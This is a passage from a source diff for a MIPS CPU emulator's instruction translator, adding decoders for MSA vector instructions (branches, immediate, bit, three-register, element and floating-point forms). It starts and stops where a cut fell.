(ctx->insn_flags & ISA_MIPS32R6 && ctx->hflags & MIPS_HFLAG_BMASK) { + MIPS_DEBUG("CTI in delay / forbidden slot"); + generate_exception(ctx, EXCP_RI); + return; + } + switch (op1) { + case OPC_BZ_V: + case OPC_BNZ_V: + { + TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); + tcg_gen_or_i64(tcg_ctx, t0, tcg_ctx->msa_wr_d[wt<<1], tcg_ctx->msa_wr_d[(wt<<1)+1]); + tcg_gen_setcondi_i64(tcg_ctx, (op1 == OPC_BZ_V) ? + TCG_COND_EQ : TCG_COND_NE, t0, t0, 0); + tcg_gen_trunc_i64_tl(tcg_ctx, *(TCGv *)tcg_ctx->bcond, t0); + tcg_temp_free_i64(tcg_ctx, t0); + } + break; + case OPC_BZ_B: + case OPC_BZ_H: + case OPC_BZ_W: + case OPC_BZ_D: + gen_check_zero_element(env, *(TCGv *)tcg_ctx->bcond, df, wt); + break; + case OPC_BNZ_B: + case OPC_BNZ_H: + case OPC_BNZ_W: + case OPC_BNZ_D: + gen_check_zero_element(env, *(TCGv *)tcg_ctx->bcond, df, wt); + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, *(TCGv *)tcg_ctx->bcond, *(TCGv *)tcg_ctx->bcond, 0); + break; + } + + ctx->btarget = ctx->pc + (int64_t)((uint64_t)s16 << 2) + 4; + + ctx->hflags |= MIPS_HFLAG_BC; + ctx->hflags |= MIPS_HFLAG_BDS32; +} + +static void gen_msa_i8(CPUMIPSState *env, DisasContext *ctx) +{ +#define MASK_MSA_I8(op) (MASK_MSA_MINOR(op) | (op & (0x03 << 24))) + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + uint8_t i8 = (ctx->opcode >> 16) & 0xff; + uint8_t ws = (ctx->opcode >> 11) & 0x1f; + uint8_t wd = (ctx->opcode >> 6) & 0x1f; + + TCGv_i32 twd = tcg_const_i32(tcg_ctx, wd); + TCGv_i32 tws = tcg_const_i32(tcg_ctx, ws); + TCGv_i32 ti8 = tcg_const_i32(tcg_ctx, i8); + + switch (MASK_MSA_I8(ctx->opcode)) { + case OPC_ANDI_B: + gen_helper_msa_andi_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, ti8); + break; + case OPC_ORI_B: + gen_helper_msa_ori_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, ti8); + break; + case OPC_NORI_B: + gen_helper_msa_nori_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, ti8); + break; + case OPC_XORI_B: + gen_helper_msa_xori_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, ti8); + break; + case OPC_BMNZI_B: + gen_helper_msa_bmnzi_b(tcg_ctx, 
tcg_ctx->cpu_env, twd, tws, ti8); + break; + case OPC_BMZI_B: + gen_helper_msa_bmzi_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, ti8); + break; + case OPC_BSELI_B: + gen_helper_msa_bseli_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, ti8); + break; + case OPC_SHF_B: + case OPC_SHF_H: + case OPC_SHF_W: + { + uint8_t df = (ctx->opcode >> 24) & 0x3; + if (df == DF_DOUBLE) { + generate_exception(ctx, EXCP_RI); + } else { + TCGv_i32 tdf = tcg_const_i32(tcg_ctx, df); + gen_helper_msa_shf_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, ti8); + tcg_temp_free_i32(tcg_ctx, tdf); + } + } + break; + default: + MIPS_INVAL("MSA instruction"); + generate_exception(ctx, EXCP_RI); + break; + } + + tcg_temp_free_i32(tcg_ctx, twd); + tcg_temp_free_i32(tcg_ctx, tws); + tcg_temp_free_i32(tcg_ctx, ti8); +} + +static void gen_msa_i5(CPUMIPSState *env, DisasContext *ctx) +{ +#define MASK_MSA_I5(op) (MASK_MSA_MINOR(op) | (op & (0x7 << 23))) + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + uint8_t df = (ctx->opcode >> 21) & 0x3; + int8_t s5 = (int8_t) sextract32(ctx->opcode, 16, 5); + uint8_t u5 = (ctx->opcode >> 16) & 0x1f; + uint8_t ws = (ctx->opcode >> 11) & 0x1f; + uint8_t wd = (ctx->opcode >> 6) & 0x1f; + + TCGv_i32 tdf = tcg_const_i32(tcg_ctx, df); + TCGv_i32 twd = tcg_const_i32(tcg_ctx, wd); + TCGv_i32 tws = tcg_const_i32(tcg_ctx, ws); + TCGv_i32 timm = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, timm, u5); + + switch (MASK_MSA_I5(ctx->opcode)) { + case OPC_ADDVI_df: + gen_helper_msa_addvi_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, timm); + break; + case OPC_SUBVI_df: + gen_helper_msa_subvi_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, timm); + break; + case OPC_MAXI_S_df: + tcg_gen_movi_i32(tcg_ctx, timm, s5); + gen_helper_msa_maxi_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, timm); + break; + case OPC_MAXI_U_df: + gen_helper_msa_maxi_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, timm); + break; + case OPC_MINI_S_df: + tcg_gen_movi_i32(tcg_ctx, timm, s5); + 
gen_helper_msa_mini_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, timm); + break; + case OPC_MINI_U_df: + gen_helper_msa_mini_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, timm); + break; + case OPC_CEQI_df: + tcg_gen_movi_i32(tcg_ctx, timm, s5); + gen_helper_msa_ceqi_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, timm); + break; + case OPC_CLTI_S_df: + tcg_gen_movi_i32(tcg_ctx, timm, s5); + gen_helper_msa_clti_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, timm); + break; + case OPC_CLTI_U_df: + gen_helper_msa_clti_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, timm); + break; + case OPC_CLEI_S_df: + tcg_gen_movi_i32(tcg_ctx, timm, s5); + gen_helper_msa_clei_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, timm); + break; + case OPC_CLEI_U_df: + gen_helper_msa_clei_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, timm); + break; + case OPC_LDI_df: + { + int32_t s10 = sextract32(ctx->opcode, 11, 10); + tcg_gen_movi_i32(tcg_ctx, timm, s10); + gen_helper_msa_ldi_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, timm); + } + break; + default: + MIPS_INVAL("MSA instruction"); + generate_exception(ctx, EXCP_RI); + break; + } + + tcg_temp_free_i32(tcg_ctx, tdf); + tcg_temp_free_i32(tcg_ctx, twd); + tcg_temp_free_i32(tcg_ctx, tws); + tcg_temp_free_i32(tcg_ctx, timm); +} + +static void gen_msa_bit(CPUMIPSState *env, DisasContext *ctx) +{ +#define MASK_MSA_BIT(op) (MASK_MSA_MINOR(op) | (op & (0x7 << 23))) + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + uint8_t dfm = (ctx->opcode >> 16) & 0x7f; + uint32_t df = 0, m = 0; + uint8_t ws = (ctx->opcode >> 11) & 0x1f; + uint8_t wd = (ctx->opcode >> 6) & 0x1f; + + TCGv_i32 tdf; + TCGv_i32 tm; + TCGv_i32 twd; + TCGv_i32 tws; + + if ((dfm & 0x40) == 0x00) { + m = dfm & 0x3f; + df = DF_DOUBLE; + } else if ((dfm & 0x60) == 0x40) { + m = dfm & 0x1f; + df = DF_WORD; + } else if ((dfm & 0x70) == 0x60) { + m = dfm & 0x0f; + df = DF_HALF; + } else if ((dfm & 0x78) == 0x70) { + m = dfm & 0x7; + df = DF_BYTE; + } else { + generate_exception(ctx, EXCP_RI); + 
return; + } + + tdf = tcg_const_i32(tcg_ctx, df); + tm = tcg_const_i32(tcg_ctx, m); + twd = tcg_const_i32(tcg_ctx, wd); + tws = tcg_const_i32(tcg_ctx, ws); + + switch (MASK_MSA_BIT(ctx->opcode)) { + case OPC_SLLI_df: + gen_helper_msa_slli_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tm); + break; + case OPC_SRAI_df: + gen_helper_msa_srai_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tm); + break; + case OPC_SRLI_df: + gen_helper_msa_srli_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tm); + break; + case OPC_BCLRI_df: + gen_helper_msa_bclri_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tm); + break; + case OPC_BSETI_df: + gen_helper_msa_bseti_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tm); + break; + case OPC_BNEGI_df: + gen_helper_msa_bnegi_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tm); + break; + case OPC_BINSLI_df: + gen_helper_msa_binsli_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tm); + break; + case OPC_BINSRI_df: + gen_helper_msa_binsri_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tm); + break; + case OPC_SAT_S_df: + gen_helper_msa_sat_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tm); + break; + case OPC_SAT_U_df: + gen_helper_msa_sat_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tm); + break; + case OPC_SRARI_df: + gen_helper_msa_srari_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tm); + break; + case OPC_SRLRI_df: + gen_helper_msa_srlri_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tm); + break; + default: + MIPS_INVAL("MSA instruction"); + generate_exception(ctx, EXCP_RI); + break; + } + + tcg_temp_free_i32(tcg_ctx, tdf); + tcg_temp_free_i32(tcg_ctx, tm); + tcg_temp_free_i32(tcg_ctx, twd); + tcg_temp_free_i32(tcg_ctx, tws); +} + +static void gen_msa_3r(CPUMIPSState *env, DisasContext *ctx) +{ +#define MASK_MSA_3R(op) (MASK_MSA_MINOR(op) | (op & (0x7 << 23))) + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + uint8_t df = (ctx->opcode >> 21) & 0x3; + uint8_t wt = (ctx->opcode >> 16) & 0x1f; + uint8_t ws = (ctx->opcode >> 11) & 0x1f; + uint8_t wd = (ctx->opcode 
>> 6) & 0x1f; + + TCGv_i32 tdf = tcg_const_i32(tcg_ctx, df); + TCGv_i32 twd = tcg_const_i32(tcg_ctx, wd); + TCGv_i32 tws = tcg_const_i32(tcg_ctx, ws); + TCGv_i32 twt = tcg_const_i32(tcg_ctx, wt); + + switch (MASK_MSA_3R(ctx->opcode)) { + case OPC_SLL_df: + gen_helper_msa_sll_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_ADDV_df: + gen_helper_msa_addv_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_CEQ_df: + gen_helper_msa_ceq_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_ADD_A_df: + gen_helper_msa_add_a_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_SUBS_S_df: + gen_helper_msa_subs_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_MULV_df: + gen_helper_msa_mulv_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_SLD_df: + gen_helper_msa_sld_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_VSHF_df: + gen_helper_msa_vshf_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_SRA_df: + gen_helper_msa_sra_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_SUBV_df: + gen_helper_msa_subv_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_ADDS_A_df: + gen_helper_msa_adds_a_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_SUBS_U_df: + gen_helper_msa_subs_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_MADDV_df: + gen_helper_msa_maddv_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_SPLAT_df: + gen_helper_msa_splat_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_SRAR_df: + gen_helper_msa_srar_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_SRL_df: + gen_helper_msa_srl_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_MAX_S_df: + gen_helper_msa_max_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case 
OPC_CLT_S_df: + gen_helper_msa_clt_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_ADDS_S_df: + gen_helper_msa_adds_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_SUBSUS_U_df: + gen_helper_msa_subsus_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_MSUBV_df: + gen_helper_msa_msubv_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_PCKEV_df: + gen_helper_msa_pckev_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_SRLR_df: + gen_helper_msa_srlr_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_BCLR_df: + gen_helper_msa_bclr_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_MAX_U_df: + gen_helper_msa_max_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_CLT_U_df: + gen_helper_msa_clt_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_ADDS_U_df: + gen_helper_msa_adds_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_SUBSUU_S_df: + gen_helper_msa_subsuu_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_PCKOD_df: + gen_helper_msa_pckod_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_BSET_df: + gen_helper_msa_bset_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_MIN_S_df: + gen_helper_msa_min_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_CLE_S_df: + gen_helper_msa_cle_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_AVE_S_df: + gen_helper_msa_ave_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_ASUB_S_df: + gen_helper_msa_asub_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_DIV_S_df: + gen_helper_msa_div_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_ILVL_df: + gen_helper_msa_ilvl_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_BNEG_df: 
+ gen_helper_msa_bneg_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_MIN_U_df: + gen_helper_msa_min_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_CLE_U_df: + gen_helper_msa_cle_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_AVE_U_df: + gen_helper_msa_ave_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_ASUB_U_df: + gen_helper_msa_asub_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_DIV_U_df: + gen_helper_msa_div_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_ILVR_df: + gen_helper_msa_ilvr_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_BINSL_df: + gen_helper_msa_binsl_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_MAX_A_df: + gen_helper_msa_max_a_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_AVER_S_df: + gen_helper_msa_aver_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_MOD_S_df: + gen_helper_msa_mod_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_ILVEV_df: + gen_helper_msa_ilvev_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_BINSR_df: + gen_helper_msa_binsr_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_MIN_A_df: + gen_helper_msa_min_a_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_AVER_U_df: + gen_helper_msa_aver_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_MOD_U_df: + gen_helper_msa_mod_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_ILVOD_df: + gen_helper_msa_ilvod_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + + case OPC_DOTP_S_df: + case OPC_DOTP_U_df: + case OPC_DPADD_S_df: + case OPC_DPADD_U_df: + case OPC_DPSUB_S_df: + case OPC_HADD_S_df: + case OPC_DPSUB_U_df: + case OPC_HADD_U_df: + case OPC_HSUB_S_df: + case OPC_HSUB_U_df: + if (df == DF_BYTE) { 
+ generate_exception(ctx, EXCP_RI); + } + switch (MASK_MSA_3R(ctx->opcode)) { + case OPC_DOTP_S_df: + gen_helper_msa_dotp_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_DOTP_U_df: + gen_helper_msa_dotp_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_DPADD_S_df: + gen_helper_msa_dpadd_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_DPADD_U_df: + gen_helper_msa_dpadd_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_DPSUB_S_df: + gen_helper_msa_dpsub_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_HADD_S_df: + gen_helper_msa_hadd_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_DPSUB_U_df: + gen_helper_msa_dpsub_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_HADD_U_df: + gen_helper_msa_hadd_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_HSUB_S_df: + gen_helper_msa_hsub_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_HSUB_U_df: + gen_helper_msa_hsub_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + } + break; + default: + MIPS_INVAL("MSA instruction"); + generate_exception(ctx, EXCP_RI); + break; + } + tcg_temp_free_i32(tcg_ctx, twd); + tcg_temp_free_i32(tcg_ctx, tws); + tcg_temp_free_i32(tcg_ctx, twt); + tcg_temp_free_i32(tcg_ctx, tdf); +} + +static void gen_msa_elm_3e(CPUMIPSState *env, DisasContext *ctx) +{ +#define MASK_MSA_ELM_DF3E(op) (MASK_MSA_MINOR(op) | (op & (0x3FF << 16))) + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + uint8_t source = (ctx->opcode >> 11) & 0x1f; + uint8_t dest = (ctx->opcode >> 6) & 0x1f; + TCGv telm = tcg_temp_new(tcg_ctx); + TCGv_i32 tsr = tcg_const_i32(tcg_ctx, source); + TCGv_i32 tdt = tcg_const_i32(tcg_ctx, dest); + + switch (MASK_MSA_ELM_DF3E(ctx->opcode)) { + case OPC_CTCMSA: + gen_load_gpr(ctx, telm, source); + gen_helper_msa_ctcmsa(tcg_ctx, tcg_ctx->cpu_env, telm, tdt); + break; + case OPC_CFCMSA: + 
gen_helper_msa_cfcmsa(tcg_ctx, telm, tcg_ctx->cpu_env, tsr); + gen_store_gpr(tcg_ctx, telm, dest); + break; + case OPC_MOVE_V: + gen_helper_msa_move_v(tcg_ctx, tcg_ctx->cpu_env, tdt, tsr); + break; + default: + MIPS_INVAL("MSA instruction"); + generate_exception(ctx, EXCP_RI); + break; + } + + tcg_temp_free(tcg_ctx, telm); + tcg_temp_free_i32(tcg_ctx, tdt); + tcg_temp_free_i32(tcg_ctx, tsr); +} + +static void gen_msa_elm_df(CPUMIPSState *env, DisasContext *ctx, uint32_t df, + uint32_t n) +{ +#define MASK_MSA_ELM(op) (MASK_MSA_MINOR(op) | (op & (0xf << 22))) + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + uint8_t ws = (ctx->opcode >> 11) & 0x1f; + uint8_t wd = (ctx->opcode >> 6) & 0x1f; + + TCGv_i32 tws = tcg_const_i32(tcg_ctx, ws); + TCGv_i32 twd = tcg_const_i32(tcg_ctx, wd); + TCGv_i32 tn = tcg_const_i32(tcg_ctx, n); + TCGv_i32 tdf = tcg_const_i32(tcg_ctx, df); + + switch (MASK_MSA_ELM(ctx->opcode)) { + case OPC_SLDI_df: + gen_helper_msa_sldi_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tn); + break; + case OPC_SPLATI_df: + gen_helper_msa_splati_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tn); + break; + case OPC_INSVE_df: + gen_helper_msa_insve_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tn); + break; + case OPC_COPY_S_df: + case OPC_COPY_U_df: + case OPC_INSERT_df: +#if !defined(TARGET_MIPS64) + /* Double format valid only for MIPS64 */ + if (df == DF_DOUBLE) { + generate_exception(ctx, EXCP_RI); + break; + } +#endif + switch (MASK_MSA_ELM(ctx->opcode)) { + case OPC_COPY_S_df: + gen_helper_msa_copy_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tn); + break; + case OPC_COPY_U_df: + gen_helper_msa_copy_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tn); + break; + case OPC_INSERT_df: + gen_helper_msa_insert_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tn); + break; + } + break; + default: + MIPS_INVAL("MSA instruction"); + generate_exception(ctx, EXCP_RI); + } + tcg_temp_free_i32(tcg_ctx, twd); + tcg_temp_free_i32(tcg_ctx, tws); + tcg_temp_free_i32(tcg_ctx, tn); + 
tcg_temp_free_i32(tcg_ctx, tdf); +} + +static void gen_msa_elm(CPUMIPSState *env, DisasContext *ctx) +{ + uint8_t dfn = (ctx->opcode >> 16) & 0x3f; + uint32_t df = 0, n = 0; + + if ((dfn & 0x30) == 0x00) { + n = dfn & 0x0f; + df = DF_BYTE; + } else if ((dfn & 0x38) == 0x20) { + n = dfn & 0x07; + df = DF_HALF; + } else if ((dfn & 0x3c) == 0x30) { + n = dfn & 0x03; + df = DF_WORD; + } else if ((dfn & 0x3e) == 0x38) { + n = dfn & 0x01; + df = DF_DOUBLE; + } else if (dfn == 0x3E) { + /* CTCMSA, CFCMSA, MOVE.V */ + gen_msa_elm_3e(env, ctx); + return; + } else { + generate_exception(ctx, EXCP_RI); + return; + } + + gen_msa_elm_df(env, ctx, df, n); +} + +static void gen_msa_3rf(CPUMIPSState *env, DisasContext *ctx) +{ +#define MASK_MSA_3RF(op) (MASK_MSA_MINOR(op) | (op & (0xf << 22))) + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + uint8_t df = (ctx->opcode >> 21) & 0x1; + uint8_t wt = (ctx->opcode >> 16) & 0x1f; + uint8_t ws = (ctx->opcode >> 11) & 0x1f; + uint8_t wd = (ctx->opcode >> 6) & 0x1f; + + TCGv_i32 twd = tcg_const_i32(tcg_ctx, wd); + TCGv_i32 tws = tcg_const_i32(tcg_ctx, ws); + TCGv_i32 twt = tcg_const_i32(tcg_ctx, wt); + TCGv_i32 tdf = tcg_temp_new_i32(tcg_ctx); + + /* adjust df value for floating-point instruction */ + tcg_gen_movi_i32(tcg_ctx, tdf, df + 2); + + switch (MASK_MSA_3RF(ctx->opcode)) { + case OPC_FCAF_df: + gen_helper_msa_fcaf_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FADD_df: + gen_helper_msa_fadd_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FCUN_df: + gen_helper_msa_fcun_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FSUB_df: + gen_helper_msa_fsub_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FCOR_df: + gen_helper_msa_fcor_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FCEQ_df: + gen_helper_msa_fceq_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FMUL_df: + gen_helper_msa_fmul_df(tcg_ctx, 
tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FCUNE_df: + gen_helper_msa_fcune_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FCUEQ_df: + gen_helper_msa_fcueq_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FDIV_df: + gen_helper_msa_fdiv_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FCNE_df: + gen_helper_msa_fcne_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FCLT_df: + gen_helper_msa_fclt_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FMADD_df: + gen_helper_msa_fmadd_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_MUL_Q_df: + tcg_gen_movi_i32(tcg_ctx, tdf, df + 1); + gen_helper_msa_mul_q_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FCULT_df: + gen_helper_msa_fcult_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FMSUB_df: + gen_helper_msa_fmsub_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_MADD_Q_df: + tcg_gen_movi_i32(tcg_ctx, tdf, df + 1); + gen_helper_msa_madd_q_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FCLE_df: + gen_helper_msa_fcle_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_MSUB_Q_df: + tcg_gen_movi_i32(tcg_ctx, tdf, df + 1); + gen_helper_msa_msub_q_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FCULE_df: + gen_helper_msa_fcule_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FEXP2_df: + gen_helper_msa_fexp2_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FSAF_df: + gen_helper_msa_fsaf_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FEXDO_df: + gen_helper_msa_fexdo_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FSUN_df: + gen_helper_msa_fsun_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FSOR_df: + gen_helper_msa_fsor_df(tcg_ctx, 
tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FSEQ_df: + gen_helper_msa_fseq_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FTQ_df: + gen_helper_msa_ftq_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FSUNE_df: + gen_helper_msa_fsune_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FSUEQ_df: + gen_helper_msa_fsueq_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FSNE_df: + gen_helper_msa_fsne_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FSLT_df: + gen_helper_msa_fslt_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FMIN_df: + gen_helper_msa_fmin_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_MULR_Q_df: + tcg_gen_movi_i32(tcg_ctx, tdf, df + 1); + gen_helper_msa_mulr_q_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case 